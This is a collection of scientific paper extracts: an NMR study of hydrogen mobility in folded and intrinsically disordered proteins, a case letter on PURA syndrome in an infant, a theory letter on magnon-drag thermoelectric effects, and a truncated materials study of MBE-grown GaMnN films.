To this end, we selected proteins that fall into two broad structural classes, ordered (folded) and intrinsically disordered (ID or ID protein, IDP), anticipating that IDPs show much more hydrogen mobility and much less order than folded ones. As a representative of ordered proteins, we chose lysozyme, an enzyme that has been amply studied for its structure, function, and disease-causing mutations. 38 We then extended our studies to several IDPs that have already been characterized in much detail. Thymosin β4 is a small actin-regulatory protein, which has been shown experimentally to be highly disordered (Á. Tantos, et al., to be published 39). α-Synuclein is also a fully disordered protein, 40,41 involved in Parkinson's disease, where it undergoes a transition to a highly structured amyloid state. Familial mutations (A30P, E46K, and A53T) promote this transition, possibly via altering the conformational equilibrium and structural flexibility of the protein. 40,41 ERD14 is a plant IDP with stress-related functions, 42,43 also shown to be highly disordered. Our goal here is to characterize these proteins in detail to determine their HM and to correlate their behavior with their physiological function and their relationship with disease. It is to be noted that some of our conclusions rely on preliminary results; further experimental results are intended for later, detailed publications.
Methods Applied
The applied NMR measurement and evaluation methods were summarized in chapter 13 of reference 10. In addition to the generally used FID signals, solid-echo signals were also detected. Results for the entire temperature range covered (extended down to 4.2 K) are discussed in separate publications. The NMR signals detected in the time domain were analyzed and transformed to spectra as described in reference 44. 1H NMR measurements and data acquisition were accomplished with Bruker AVANCE III and Bruker SXP 4-100 NMR pulse spectrometers at ω0/2π = 82.4 MHz, with a stability better than ±10−6 and a magnet inhomogeneity of 2 ppm. The temperature was controlled by an open-cycle Janis cryostat with a stability of ±0.1°C; the uncertainty of the temperature scale was ±1°C. The data points in the figures are based on spectra recorded by averaging signals to reach a signal-to-noise ratio of 50.
The number of averaged NMR signals was varied to achieve the desired signal quality for each sample.
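The required number of averages follows from the standard result that the signal-to-noise ratio of N co-added transients grows as the square root of N. A short sketch (the single-shot S/N values are hypothetical):

```python
import math

def averages_needed(snr_single, snr_target=50.0):
    """Number of co-added transients needed to reach snr_target, using
    the standard result that S/N grows as sqrt(number of averages)."""
    return math.ceil((snr_target / snr_single) ** 2)

for snr1 in (1.0, 5.0, 25.0):
    print(f"single-shot S/N {snr1:>4}: average {averages_needed(snr1)} signals")
```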
Results and Discussion
The NMR signals presented are limited to the lowest temperature of 4.2 K and to room temperature. The proteins lysozyme (T. Verebélyi, et al., to be published) and thymosin β4 were chosen as examples representing the expected lowest and highest HM values. The spectra of the FID and of the solid-echo signals differ only slightly from each other; the spectrum of the FID is somewhat wider as a consequence of the local magnetic fields coming from inhomogeneous proton-proton contributions. Unlike the data reported earlier, 37 the shape of the spectrum was not Gaussian either at T = 4.2 K or at room temperature (Figs. 1-4). The spectra could be decomposed into at least two components at both low and high temperatures. The presence of different spectral components indicates the heterogeneity of the proton spin systems. The relative weights of the components vary with the protein type and the temperature. The room-temperature narrow spectral component was wider than a signal coming from "free" water alone. The other proteins listed in Table 4 show similar behavior.
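A least-squares sketch of the kind of two-component decomposition described above is given below. The Gaussian forms, the synthetic noisy "spectrum", and all parameter values are illustrative assumptions only; they are not the line shapes or the fitting model actually used for the proteins studied here.

```python
import numpy as np
from scipy.optimize import curve_fit

def two_gaussians(f, a_b, s_b, a_n, s_n):
    """Broad + narrow Gaussian components centred at zero offset."""
    return (a_b * np.exp(-f**2 / (2 * s_b**2))
            + a_n * np.exp(-f**2 / (2 * s_n**2)))

# Synthetic 'measured' spectrum (frequency offset in kHz)
f = np.linspace(-60, 60, 1201)
rng = np.random.default_rng(0)
y = two_gaussians(f, 1.0, 12.0, 0.6, 1.5) + 0.01 * rng.normal(size=f.size)

popt, _ = curve_fit(two_gaussians, f, y, p0=[1, 10, 0.5, 2])
a_b, s_b, a_n, s_n = popt
# The second moment of a Gaussian component is simply sigma^2, and its
# relative weight is proportional to amplitude * sigma.
print(f"broad:  weight ~ {a_b*s_b:.2f}, M2 = {s_b**2:.1f} kHz^2")
print(f"narrow: weight ~ {a_n*s_n:.2f}, M2 = {s_n**2:.2f} kHz^2")
```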
The second moments calculated from the spectra and the HM hydrogen mobility parameters are summarized in Table 4; one should remember that the t-indexed parameters apply to whole molecules, and the indices b and n refer to the two-component resolutions. The two-component spectra and the relevant moments measured at room temperature indicate two types of hydrogen-hydrogen radial vector mobility, characteristic of two individual populations of residues of the molecule. The difference between the very-low-temperature second moment and the room-temperature second moment of the broad component shows that the molecule has no part made up entirely of static hydrogen atoms (immobile proton-proton radial vectors) at elevated temperatures. Even in the solid phase, the mobility HM_t(T) characteristic of the whole molecule is considerably greater for the IDP molecules than for globular lysozyme. Accordingly, the value of HM_t(T) is presumably closely associated with the structural disorder of proteins. It is of note that these types of molecular motions do not become frozen in aqueous solutions either. The second moments measured for lysozyme at low and high temperatures give the smallest HM_t value, which we use as a reference point for globular (structured) proteins. Thymosin β4 represents the other extreme, showing the highest proton-proton radial vector mobility. All the experimental data measured by different methods prove the substantial disorder of this molecule. ERD14 also has a high mobility, which is in line with its largely disordered character as a molecular chaperone.
The results on the α-synuclein mutants are important from another point of view. HM provides a measure of distinction that is model-free and quantitative and can be related to the function of IDPs. Although it is premature to draw general conclusions, this fits well into the current trend of linking quantitative descriptions of the structural features of IDPs with their function (the unstructure-function relationship). It is of further note that the proton-proton mobility of the α-synuclein point mutants already shows significant differences at the temperature of liquid helium, in the case of WT and A53T, in contrast with E46K and A30P. The smaller second-moment values for the α-synuclein variants wild-type (WT) and A53T (compared with the two other mutants) can only be explained by assuming that the molecule is not totally rigid even at such low temperatures; these variants show a mobility of HM_t ~0.20. It was presumed that the rigid-lattice second moments of the WT and the other α-synuclein mutants are the same, with the value M2(He) = 22·10−8 T2 (numbers in parentheses, Table 4). This presumption is reasonable, as these α-synuclein variants differ from each other in only one amino acid out of 141. By the criterion of HM, the wild type and A53T are the most disordered of the four α-synuclein variants, i.e., they have the most dynamic molecular groups (hydrogen atoms). It is of note that earlier NMR data showed similar behavior for their frozen aqueous solutions, 41 and these differences in behavior seem to have a bearing on the effect of the familial mutations on local ordering, which is conducive to the transition to the disease-related amyloid state. In Table 4, the parameter values in parentheses are given for a hypothetical rigid-lattice state; the second moment (M2) values are given in units of 10−8 T2 = 1 G2, and the HM_x parameters are defined by Equation 6. The designations He and RT mean T ~4 K (liquid-helium temperature) and room temperature, respectively. The index t refers to the whole spectrum, while b stands for the broad and n for the narrow spectral component.
Conclusions and Outlook
The hydrogen mobility order parameter HM(T) proposed here represents the relative missing part of the time-independent (rigid-lattice) 1H NMR second moment arising from the proton-proton dipole-dipole interaction in hydrogen-rich molecules, including organic compounds, amino acids, and proteins. HM can take values between 0 and 1, characteristic of a rigid lattice and of the liquid state, respectively, and the actual values are temperature-dependent quantities.
In the context of the present study, the term motion refers to the internal motions of a molecule (not to the translational diffusion of molecules in a liquid), and the time scale is set by the motions visible to NMR. The above results, together with the introduction of the order parameter, represent a theoretical and practical framework that can guide further investigations and assist in classifying proteins.
It is worth addressing why we chose the order parameter, and not the second moment, to characterize mobility. To calculate the second moment of a rigid lattice, precise atomic coordinates are needed, which can be obtained only by applying models. In the case of active molecular motions, the details of these motions should also be modeled. It is fair to ask how many parameters should be introduced to interpret a single measured quantity: molecular motions result in almost twice as many parameters as a rigid system. The hydrogen mobility introduced here provides an overall dynamic attribute, i.e., a model-independent quantitative value, which characterizes the general internal dynamics of the molecule at the actual temperature. It is hard to overemphasize that only two measured quantities are used in the hydrogen mobility factor, namely the reduced second moment measured at the actual temperature and a reference second-moment value measured for the rigid-lattice state. It is not at all intended to exclude models as tools to help the interpretation of the measured second moments. For example, the four variants of α-synuclein have almost identical primary structures, yet their NMR spectra and second moments show explicit differences even at T < 10 K.
Knowledge of the measured M2(RL) gives significant help in explaining the NMR relaxation times. The coupling constant of the relaxation formalisms (see, e.g., Chapter 12 in ref. 9, Chapter 13 in ref. 10, and refs. 15 and 45) can be determined directly from the second moment of the rigid lattice. Therefore, of the three quantities (coupling constant, activation energy, and correlation time), only the latter two need to be determined from the relaxation time vs. temperature curves. We previously found that three-parameter fitting of the relaxation-time model produces absurd results in the case of the IDPs. 46 The spatial and the temporal averages are immiscible categories for heterogeneous systems such as protein molecules.

Figure: FID (left) and spectrum (right) of lyophilized Tβ4 measured at T = 300 K, ν0 = 82.4 MHz. The spectrum was decomposed into a broad rigid-lattice line and a narrow motionally narrowed line; accordingly, the FID shows fast rigid-lattice and slow motionally narrowed relaxation. The second moment (M2) of the spectrum is (6.2 ± 0.1)·10−8 T2, the broad line has M2 = (7.0 ± 0.1)·10−8 T2, and the narrow line has M2 = (0.5 ± 0.1)·10−8 T2. The spectral widths are 3.8 ± 0.1 kHz, 27.9 ± 0.1 kHz, and 0.5 ± 0.05 kHz, respectively. (The corresponding shape parameters are 3.8 ± 0.3, 3.0 ± 0.3, and 11.2 ± 0.3, respectively.) Estimated errors are given.
Our results prove that the proposed order parameter (HM) for hydrogen mobility is a well-defined physical quantity that can be experimentally determined in a model-free way for small molecules and proteins alike. Furthermore, it does not involve any speculation or reference to "fitting parameters". HM provides a theoretical and practical framework for investigating the correlations between global structural order and internal molecular mobility in solids. It provides a simple yet powerful method for the fast and quantitative distinction between globular and ID proteins. Whereas order parameters of individual resonances have the power to resolve detailed structural features of proteins (globular and ID alike), there is a strong trend in the IDP literature to use global parameters of structure, disorder, and flexibility for approaching their function. In this sense, the novel parameter fits into the general characterization of IDPs. It even has the power to show quantitative differences between the dynamics of proteins whose sequences differ in only one amino acid. It provides a bridge connecting the dynamic properties measured for aqueous solutions and for lyophilized proteins. Finally, HM calls attention to the importance of precise measurements and of the adequate selection of reference temperatures.
Disclosure of Potential Conflicts of Interest
No potential conflicts of interest were disclosed. | 2018-04-03T00:57:08.324Z | 2013-01-01T00:00:00.000 | {
"year": 2013,
"sha1": "abd47de3209c7a9292b70a1b9514f011d1fb407f",
"oa_license": "CCBYNC",
"oa_url": "https://www.tandfonline.com/doi/pdf/10.4161/idp.25767?needAccess=true",
"oa_status": "HYBRID",
"pdf_src": "PubMedCentral",
"pdf_hash": "abd47de3209c7a9292b70a1b9514f011d1fb407f",
"s2fieldsofstudy": [
"Chemistry",
"Materials Science"
],
"extfieldsofstudy": [
"Chemistry",
"Medicine"
]
} |
226618139 | pes2o/s2orc | v3-fos-license | Growing Spectrum of Episodic Apnea with Hypotonia in a Young Infant
Growing Spectrum of Episodic Apnea with Hypotonia in a Young Infant
To the editor, A 48-day-old infant presented with a 1-day history of altered breathing pattern and a 20-day history of poor feeding. Her perinatal period was uneventful. She was a full-term (38 weeks of gestation) first child born to third-degree consanguineous parents, with a birth weight of 2.5 kg and a head circumference of 31 cm. She was on mixed feeds, with early introduction of cow's milk owing to poor sucking at the breast. Failure to thrive was prominent. At admission, she had two episodes of self-limiting tonic seizures. She was lethargic, with poor state-to-state variability and an irregular breathing pattern. She was afebrile and also underweight (2.25 kg, <-3z), stunted (50.5 cm, <-3z), and microcephalic (32 cm, <-3z). Parental screening for the pathogenic variation was negative.
The child was initiated on early rehabilitation services, and at the 3-month follow-up she had had no further episodes of breathing dysfunction. Reproductive counselling has been offered to the parents.
The list of clinical differential diagnoses for episodic apnea with generalized hypotonia in a young infant is exhaustive. Metabolic disorders like mitochondrial respiratory chain disorders, Leigh's disease, glycine encephalopathy, and citrullinemia; neurotransmitter disorders like aromatic amino acid decarboxylase deficiency; neuromuscular disorders like congenital myasthenia and dystroglycanopathy; and structural causes like Joubert syndrome and congenital central hypoventilation syndrome merit evaluation. In addition, the above features can also be seen in a lesser-known developmental encephalopathy due to mutations of the purine-rich element binding protein A (PURA) gene on chromosome 5q, termed "PURA syndrome." [1] The literature on PURA syndrome is sparse; it should be suspected in infants with the 4H constellation comprising hypotonia, hypoventilation, hypothermia, and hypersomnolence. [2] A review of 54 cases by Reijnders et al. reported that the earliest presentations are excessive hiccups in utero and post-term delivery (>41 weeks), seen in more than 50% of the cases (55%-56%). Hypotonia from birth (96%) is the most common manifestation of the condition, leading to feeding difficulties (77%) that may require tube feeding. Hypersomnolence (66%), breathing difficulties that include apneas and congenital hypoventilation (57%), an exaggerated startle response (44%), and hypothermia (35%) were the next most common clinical features. [1] The association of infantile spasms and myotonia has also been reported. [3,4] Older children present with moderate-to-severe intellectual impairment, absent speech, seizures, spasticity, unstable gait, and motor delay. [5] Uncontrolled seizures in some cases may result in loss of achieved milestones, mimicking neuroregression. Movement disorders, seizure-like movements, and ataxic movements were reported in 20% of cases. [1] Peripheral neuropathy can occur at a young age. The hypotonia can also lead to swallowing problems at a later age, as well as drooling and constipation in up to 60% of the cases. Dysmorphic features like a high anterior hairline, myopathic face, full cheeks, and almond-shaped palpebral fissures have been described in cases of PURA syndrome. [1,2] However, the clinical phenotype is nonspecific, with no diagnostic criteria, and the diagnosis is strictly genetic, by exome analysis. Multiorgan screening for structural heart defects, genitourinary abnormalities, strabismus, hip dysplasia and scoliosis, and metabolic and endocrine abnormalities like vitamin D deficiency, hypothyroidism, and short stature is warranted in children with PURA syndrome. Screening in the index child on follow-up was unremarkable. Nonspecific white matter changes and delayed myelination (30%), similar to the index case, are the most frequently reported abnormalities on MRI neuroimaging. Corpus callosal abnormalities, lateral ventricular widening, and mild parenchymal atrophy have also been described. [6] Treatment for this condition is largely supportive, with the institution of early intervention services.
In conclusion, PURA-related developmental disorders should be suspected in a young infant with generalized hypotonia and episodic apnea. Early recognition is essential to assist in reproductive counselling.
Declaration of patient consent
The authors certify that they have obtained all appropriate patient consent forms. In the form the patient(s) has/have given his/her/their consent for his/her/their images and other clinical information to be reported in the journal. The patients understand that their names and initials will not be published and due efforts will be made to conceal their identity, but anonymity cannot be guaranteed.
Financial support and sponsorship
Nil.
Conflicts of interest
There are no conflicts of interest. | 2020-09-03T09:06:26.335Z | 2020-08-28T00:00:00.000 | {
"year": 2020,
"sha1": "79658440f1eec1f18bd5aab4ca1bea187027db2f",
"oa_license": "CCBYNCSA",
"oa_url": "https://doi.org/10.4103/aian.aian_482_20",
"oa_status": "GOLD",
"pdf_src": "ScienceParsePlus",
"pdf_hash": "4c306750335b7da0d965f304ce842d8c9b1be593",
"s2fieldsofstudy": [
"Medicine",
"Biology"
],
"extfieldsofstudy": [
"Medicine"
]
} |
119196343 | pes2o/s2orc | v3-fos-license | Microscopic Theory of Magnon-Drag Thermoelectric Transport in Ferromagnetic Metals
A theoretical study of the magnon-drag Peltier and Seebeck effects in ferromagnetic metals is presented. A magnon heat current is described perturbatively from the microscopic viewpoint with respect to electron-magnon interactions and the electric field. Then, the magnon-drag Peltier coefficient Π_mag is obtained as the ratio between the magnon heat current and the electric charge current. We show that Π_mag = C_mag T^{5/2} at a low temperature T; that the coefficient C_mag is proportional to the spin polarization P of the electric conductivity; and that P > 0 for C_mag < 0, but P < 0 for C_mag > 0. From experimental results for magnon-drag Peltier effects, we estimate that the strength of the electron-magnon interaction is about 0.3 eV·Å^{3/2} for permalloy.
KEYWORDS: Peltier effect, Seebeck effect, magnon drag, spin caloritronics, spintronics, spin current, electron-magnon interaction

Understanding the interactions between spin dynamics and transport phenomena in ferromagnetic materials is one of the central issues in spintronics and spin caloritronics. 1) In particular, it is important to clarify the thermal properties of spin dynamics, that is, the magnon scattering mechanisms, at finite temperature. The magnon-drag thermoelectric effects proposed by Bailyn 2) are good subjects for investigating the thermal properties and transport phenomena of magnons, because the effects are determined by substance-specific properties 3) and are sensitive to external magnetic fields. Moreover, the effects are useful in the study of fundamental electron-magnon interactions. Blatt et al. 4) reported that the Seebeck coefficient S for iron takes a maximum value near 200 K, that S is unresponsive to doping with heavy atoms and to annealing, and that S is well fitted by the form S = C1T + C2T^{3/2} (where C1 and C2 are constants). These features differ from those expected for phonon-drag Seebeck effects 3) both quantitatively and qualitatively. Grannemann and Berger 5) phenomenologically derived a convenient expression, Eq. (1), for the magnon-drag Peltier coefficient in ferromagnetic metals, assuming that the drift velocity of magnons, v_mag, is proportional to the drift velocity of electrons (i.e., v_mag = ηv_e); in this expression, D is the spin-wave stiffness constant, e > 0 is the elementary charge, n_e is the number of conduction electrons per unit volume, V is the volume of the system, n(x) := [exp(x/k_BT) − 1]^{−1} is the Bose-Einstein distribution function, k_B is the Boltzmann constant, T is the absolute temperature, and ω_q is the energy dispersion relation for magnons. By using this expression, they found that at low temperature Π^η_mag ∝ T^{5/2}, and that consequently the magnon-drag Seebeck coefficient S^η_mag = Π^η_mag/T ∝ T^{3/2}. In addition, by fitting Eq. (1) to experimental data, they obtained the values η = 2.98 for Ni69Fe31 and η = 2.20 for Ni66Cu34. Recently, Costache et al. 6) have developed a magnon-drag thermopile that can cancel out all contributions to the thermopower except for that of magnons, allowing the electric voltage induced by the magnon-drag Seebeck effect to be measured directly. They found that the Seebeck coefficient of a magnon-drag thermopile made of permalloy peaks near 180 K and is well fitted by Π^η_mag/T at temperatures below 180 K (η = 3). As noted above, the phenomenological expression (1) can accurately describe the experimental results. However, there has been no progress on the theoretical front toward understanding magnon-drag thermoelectric effects from the microscopic viewpoint.
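The T^{5/2} law quoted above can be checked numerically. In the phenomenological picture, Π^η_mag is proportional to the thermal magnon energy per conduction electron, and for a gapless quadratic dispersion ω_q = Dq² the magnon energy density scales as T^{5/2}. The sketch below is only an illustration of that scaling: the stiffness value is an assumed typical number, not a fitted material parameter.

```python
import numpy as np
from scipy.integrate import quad

KB = 1.380649e-23                        # Boltzmann constant [J/K]
D = 250e-3 * 1.602177e-19 * 1e-20        # assumed stiffness 250 meV*A^2 [J*m^2]

def magnon_energy_density(T):
    """u(T) = (1/2pi^2) * integral of q^2 * E_q * n(E_q) dq [J/m^3],
    with E_q = D q^2 (gapless quadratic magnon dispersion)."""
    def integrand(q):
        e_q = D * q**2
        return q**2 * e_q / np.expm1(e_q / (KB * T))
    q_max = 30.0 * np.sqrt(KB * T / D)   # thermal cutoff; integrand ~0 beyond
    val, _ = quad(integrand, 0.0, q_max, limit=200)
    return val / (2.0 * np.pi**2)

temps = np.array([10.0, 20.0, 40.0, 80.0])
u = np.array([magnon_energy_density(t) for t in temps])
exponent = np.polyfit(np.log(temps), np.log(u), 1)[0]
print(f"u(T) ~ T^{exponent:.3f}")        # -> ~2.5, i.e., the T^(5/2) law
```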
In this letter, we describe magnon-drag thermoelectric phenomena in ferromagnetic metals at the microscopic level and aim to obtain detailed information on the magnon-drag thermoelectric coefficients. We calculate a magnon thermal current driven by an electric field using the Keldysh Green function technique. The mathematical form of the resultant magnon-drag Peltier coefficient conforms to Grannemann and Berger's expression (1) and a microscopic expression for η is obtained. Furthermore, we show that η, a physically important feature, is proportional to the spin polarization of the electric conductivity.
Let us consider a Hamiltonian describing ferromagnetic metals, H = Σ_{kσ} ε_{kσ} c†_{kσ}c_{kσ} + Σ_q ω_q b†_q b_q + H_em, where c_{kσ} is an operator that annihilates the σ-spin electron with a wave vector k, ε_{kσ} := ℏ²k²/2m − σΔ/2 − μ is the energy dispersion relation for electrons measured from the chemical potential μ, m is the mass of an electron, Δ stands for the exchange splitting, b_q is an operator that annihilates a magnon with a wave vector q, and H_em is an electron-magnon interaction, 7-9) in which I represents the strength of the electron-magnon interaction. The interaction with a static homogeneous electric field E := −dA(t)/dt is given by H′(t) := −j_e·A(t)V in terms of the electric charge current density operator j_e := −(eℏ/mV) Σ_{kσ} k c†_{kσ}c_{kσ}. We define the space-averaged magnon heat current density operator j_mag(t), with operators in the Heisenberg representation with respect to H + H′(t). Using the lesser function, 10,11) the statistical average of j_mag(t) can be represented in a form in which ⟨···⟩ is a statistical average in H + H′(t), H′(t) being regarded as the nonequilibrium part. We perform the lowest-order calculation for j_mag(t) with respect to both H_em and H′(t), as shown in Fig. 1. In energy space, ΔD^<_q(ω₊, ω₋) corresponds to the diagrams shown in Fig. 1; here ω± := ω ± Ω/2, E± := E ± Ω/2, A(Ω) := ∫dt e^{iΩt/ℏ}A(t), and g_{kσ}(E) and d_q(ω) are the unperturbed Keldysh Green functions of the σ-spin electron with the wave vector k and of the magnon with the wave vector q, respectively. Taking the lesser component, we obtain an expression involving d^a_q(ω) and d^r_q(ω), the unperturbed advanced and retarded Green's functions of the magnon. The part representing the electron-hole pair is calculated to first order in Ω: the factor −df(E)/dE acts on the Green's functions of the electron approximately like the Dirac delta function δ(E) under the condition δ ≫ k_BT. This approximation is valid at temperatures below about 100 K, because δ is of the order of 10⁻² eV in metals. Considering only the contribution of the σ-spin electrons at the Fermi surface |k| = |k_{Fσ}| and the long-wavelength region ℏ²k_{Fσ}·q/[m(ω − Δ)] ≪ 1, we obtain an expression in which σ_σ := (πe²ℏ³/3m²V) Σ_k k² ρ_{kσ}(0)² is the spin-dependent electric conductivity, 12) and we use the corresponding identity. Using Eqs. (2) and (3), we arrive at a result in which j_c := (σ↑ + σ↓)E is the electric charge current and P := (σ↑ − σ↓)/(σ↑ + σ↓) is the spin polarization of the electric conductivity. As a result, we obtain the magnon-drag Peltier coefficient for each spatial component (x, y, z). This result indicates that the magnon-drag Peltier coefficient is proportional to the spin polarization. To evaluate the ω integral, we express the self-energy of the magnon in terms of the Gilbert damping constant α. 13) Considering the low-energy region ω_q < k_BT in the q summation, and assuming α ≪ 1 and Δ ≪ δ/α, we obtain the result given in Eq. (4). A comparison between Eqs. (4) and (1) affords a microscopic expression, Eq. (5), for the phenomenological parameter η. Grannemann and Berger 5) experimentally obtained η = 2.98 for Ni69Fe31 using n_e = 3.1 × 10⁻² Å⁻³ in Eq. (1). Putting these values into Eq. (5), we can estimate the strength of the electron-magnon interaction to be I = 0.3 eV·Å^{3/2} by using typical values for ferromagnetic metals: Δ = 0.1 eV, 14) P = 0.5, 14) δ = 0.01 eV, 15) and α = 0.01. 15) Equation (4) could also be useful for determining the sign of P by a comparison with experimental data.
When ω_q = Dq² + Δ_gap, Eq. (4) can be written in a correspondingly modified form. Since C_mag can be determined experimentally by fitting a function of T to the temperature dependence of the Peltier coefficient, we can evaluate the sign of P; that is, P > 0 for C_mag < 0 and P < 0 for C_mag > 0. This is analogous to the situation in which the type of charge carriers in a semiconductor can be determined by Peltier or Seebeck measurements.
Finally, we refer to a microscopic description of Seebeck effects. The magnon-drag Seebeck effect is the counter-phenomenon of the magnon-drag Peltier effect. Therefore, it is expected that the two effects satisfy Onsager's reciprocity relation; that is, the magnon-drag Seebeck coefficient must be given by S_mag = Π_mag/T. The first work to microscopically describe a response to a temperature gradient was that of Luttinger. 16) Following that approach, we can describe Seebeck effects by introducing a Hamiltonian ∫dr h(r)φ_L(r, t), where h(r) is the total Hamiltonian density operator and φ_L(r, t) is a pseudoscalar potential. In other words, we calculate the response of the nonequilibrium electric charge current to this Hamiltonian and then replace ∇φ_L(r, t) with (∇T)/T. However, here we consider the Hamiltonian −j_mag·A_L(t)V instead of ∫dr h(r)φ_L(r, t), from an analogy with the fact that the product of the charge density and the scalar potential corresponds to the product of the charge current density and the vector potential. Thus, we regard −j_mag·A_L(t)V as a Hamiltonian describing a static homogeneous temperature gradient, and we assume that dA_L(t)/dt corresponds to (∇T)/T, just as E is given by −dA(t)/dt. This Hamiltonian has some advantages. First, the diffusion ladder arising from short-range impurity scattering vanishes for a static homogeneous temperature gradient. Second, it is easy to see that the Seebeck coefficient is associated with a charge current-energy current correlation function, 17) because −j_mag·A_L(t)V has the same form as the Hamiltonian −j_e·A(t)V that we used to account for the static homogeneous electric field. Considering the lowest-order contribution shown in Fig. 2, and carrying out calculations similar to those above, we obtain the magnon-drag electric charge current j^e_mag. As a consequence, we can confirm that Onsager's reciprocity relation S_mag = Π_mag/T is reproduced by using the relation dA_L(t)/dt → ∇T/T and the definition of the Seebeck coefficient j^e_mag =: −σS_mag∇T. In summary, we have shown from the microscopic viewpoint that Π_mag = C_mag T^{5/2} and S_mag = Π_mag/T = C_mag T^{3/2} at a low temperature T, and that the coefficient C_mag is proportional to the spin polarization P of the electric conductivity. Moreover, from a comparison with experimental results for magnon-drag Peltier effects, we estimate that the strength of the electron-magnon interaction is about 0.3 eV·Å^{3/2} for permalloy. | 2012-10-29T13:04:25.000Z | 2012-09-04T00:00:00.000 | {
"year": 2012,
"sha1": "8053a1fd8071cc111742883bdbdb0889e4733961",
"oa_license": null,
"oa_url": "http://arxiv.org/pdf/1209.0685",
"oa_status": "GREEN",
"pdf_src": "Arxiv",
"pdf_hash": "8053a1fd8071cc111742883bdbdb0889e4733961",
"s2fieldsofstudy": [
"Physics",
"Materials Science"
],
"extfieldsofstudy": [
"Physics",
"Materials Science"
]
} |
53472661 | pes2o/s2orc | v3-fos-license | Structural characterisation of MBE grown zinc-blende Ga1-xMnxN/GaAs(001) as a function of Ga flux. In: Microscopy of semiconducting materials: proceedings of
Ga1-xMnxN films grown on semi-insulating GaAs(001) substrates at 680°C with a fixed Mn flux and a varied Ga flux demonstrated a transition from zinc-blende/wurtzite mixed-phase growth at low Ga flux (N-rich conditions) to zinc-blende single-phase growth with surface Ga droplets at high Ga flux (Ga-rich conditions). N-rich conditions were found favourable for Mn incorporation into the GaN lattice. α-MnAs inclusions were identified extending into the GaAs buffer layer.
INTRODUCTION
III-V ferromagnetic semiconductors are of interest because of their potential application within spintronic device structures (Wolf et al 2001). Theoretical prediction of the Curie temperature for various semiconductors (Dietl et al 2000) suggests that a T_C value above room temperature is possible for zinc-blende GaN containing 5 at% Mn and a hole concentration of 3.5×10²⁰ cm⁻³. In view of the limited solid solubility of Mn in GaN, it becomes necessary to use non-equilibrium growth techniques such as plasma-assisted molecular beam epitaxy (PAMBE) to establish appropriate conditions for the growth of uniform Ga1-xMnxN alloys. To date, highly p-type Ga1-xMnxN layers with carrier concentrations exceeding 10¹⁸ cm⁻³ have been obtained by PAMBE (Novikov et al 2004).
Earlier work on the growth of zinc-blende GaN suggests that exact control of the III:V ratio close to the stoichiometric condition allows the production of single-phase zinc-blende epitaxial layers, whilst deviation to Ga- or N-rich conditions reportedly produces mixed zinc-blende and wurtzite material (Giehler et al 1995; Ruvimov et al 1997). More recently, various Mn-N or Ga-Mn-N precipitates have been reported for wurtzite GaN epilayers grown on sapphire substrates (e.g. Kuroda et al 2003 and Nakayama et al 2003).
In this paper, the influence of the Ga:N ratio on the microstructural development of Ga1-xMnxN/GaAs(001) grown by PAMBE is assessed using a variety of complementary analytical techniques.
EXPERIMENTAL
Zinc-blende Ga1-xMnxN epilayers were grown on semi-insulating (001)-oriented GaAs substrates at 680°C by PAMBE. Briefly, a GaAs buffer layer of thickness ~0.15 µm was deposited to provide a clean surface for epitaxy. Following initiation of the N plasma, the Mn and N shutters were opened whilst the As shutter was closed. The Mn flux was fixed at a level of 1.0×10⁻⁸ mbar, while the Ga:N ratio was varied by changing the Ga flux from 7.5×10⁻⁸ mbar to 1.2×10⁻⁶ mbar. This corresponded to a transition from N-rich to Ga-rich conditions, with the latter being identified by the development of Ga droplets on the growth surface. An overall chamber pressure of 2-3×10⁻⁵ mbar was maintained by a flow of N₂. The growth conditions for the sample set are summarised in Table 1.
The bulk and fine-scale defect microstructure of each sample was assessed. A Philips X'Pert diffractometer was initially used to assess the bulk crystal structure of the deposited epilayers. The complementary technique of reflection high-energy electron diffraction (RHEED), using a modified Jeol 2000fx transmission electron microscope with as-grown or HCl-etched specimens mounted vertically immediately beneath the projector lens, was then applied to appraise the near-surface microstructure of the samples. Sample morphology was assessed using an FEI XL30 scanning electron microscope operated at 15-20 kV. Samples for TEM investigation across the stoichiometric range were prepared in plan-view and cross-sectional geometries using sequential mechanical polishing and argon ion-beam thinning. Samples were assessed using conventional diffraction-contrast techniques in Jeol 2000fx and 4000fx instruments, and energy-dispersive X-ray (EDX) analysis was performed using an Oxford Instruments ISIS system.
RESULTS AND DISCUSSION
The formation of zinc-blende Ga1-xMnxN was confirmed by XRD spectra obtained across the sample set. Variation in the full width at half maximum (FWHM) values of the 002 reflection across the stoichiometric range (Table 1) suggests that the layer structural quality is optimised under slightly Ga-rich growth conditions. However, no evidence for the presence of second-phase wurtzite material was discerned in any of the spectra. As observed using SEM, the sample grown closest to ~1:1 stoichiometric conditions appears specular, indicative of a smooth surface. Samples grown under N-rich conditions appear to exhibit a slightly rougher surface, whilst samples grown under Ga-rich conditions showed increasing amounts of Ga droplets on the sample surface with increasing Ga flux.
RHEED patterns recorded along <110> projections for samples A, D and G are presented in Fig. 1(a-c). It is noted that clear, sharp spots were only obtained for the Ga-rich samples after removal of the surface Ga droplets using boiling HCl. All the samples demonstrated the cubic structure, with extra spots and/or streaks indicating varying degrees of mixed-phase growth and stacking disorder on inclined {111} planes. In particular, a transition from mixed hexagonal/cubic (α/β) phase growth under N-rich conditions to single-phase cubic material under Ga-rich conditions was observed (as distinct from the previous indications of XRD).
By way of example, for sample A grown under N-rich conditions, dominant diffraction spots from both cubic and hexagonal material were identified (Fig. 1a). The indexing of Fig. 1a is clarified with reference to the schematic diagram of Fig. 1d, which illustrates the orientation relationship between the two phases, with cubic <110> // hexagonal <11-20> and cubic {111} // hexagonal {0001}. It is noted that the extra spots due to the hexagonal phase became faint with increasing Ga flux, disappearing when the Ga:N ratio approached 1:1 stoichiometry (Fig. 1b).
For samples grown under N-rich conditions and at ~1:1 stoichiometry, streaks preferentially aligned along one <111> direction were also observed, indicating the preferential alignment of planar defects (i.e. thin microtwins and stacking faults), inclined to the growth surface, on just one set of {111} planes (Figs 1a and b). Similar streaks were observed along both <111> directions for samples grown under Ga-rich conditions, again attributable to a high density of inclined planar defects (Fig. 1c). It is noted that samples grown under N-rich and nearly 1:1 stoichiometric conditions exhibited strong anisotropy in the distribution of planar defects, these being present for just one <110> sample projection, whilst samples grown under Ga-rich conditions exhibited planar defects for both of the orthogonal <110> and <1-10> sample projections. This variation in the anisotropic distribution of planar defects suggests that the effect is associated with the transition from N-rich to Ga-rich growth, i.e. due to differences in III:V stoichiometry at the growth surface during the process of epilayer nucleation, rather than being due to slight vicinality of the substrate surface. In addition, the presence of streaks perpendicular to the shadow edge for samples grown under Ga-rich conditions (Fig. 1c), following HCl etching, is attributed to patches of relatively smooth surface. More precisely, however, the diffraction effect of streaks perpendicular to 